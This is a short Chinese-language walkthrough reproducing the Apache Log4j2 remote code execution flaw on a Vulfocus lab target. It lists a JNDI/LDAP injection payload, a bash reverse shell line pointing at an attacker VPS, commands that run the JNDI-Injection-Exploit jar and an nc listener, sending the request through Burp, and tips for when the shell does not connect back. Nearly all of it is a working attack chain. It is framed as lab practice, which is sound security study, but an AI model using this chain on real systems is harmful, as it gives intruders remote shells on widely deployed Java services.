- Log4j2远程命令执行复现
- 前言
- 一、Apache Log4j2漏洞描述
- 二、复现环境
- 01.工具
- 02.漏洞验证过程
- 03.反弹shell
- 总结
前言 一、Apache Log4j2漏洞描述
描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。。
二、复现环境
环境是http://vulfocus.fofa.so平台的
下载:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
02.漏洞验证过程02.1 POST请求,构造payload=xxx
http://vulfocus.fofa.so:56688/hello
POST
payload=${jndi:ldap://o5grdz.dnslog.cn/}
02.2 dns解析平台
http://www.dnslog.cn/
base64加密shell反弹
使用:https://www.jackson-t.ca/runtime-exec-payloads.html
构造反弹shell命令:
bash -i >& /dev/tcp/vps-ip/port 0>&1
使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload
开启服务生成链接payload并开启nc监听,生成的链接每个都试一下。
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反弹shell命令" -A vps-ip
VPS开启监听8080端口nc -lvp 8080
利用Burp发送payload
反弹成功
nc反弹成功
如果反弹不成功请检查①vps防火墙端口是否开放,②构造命令时编码是否正确。
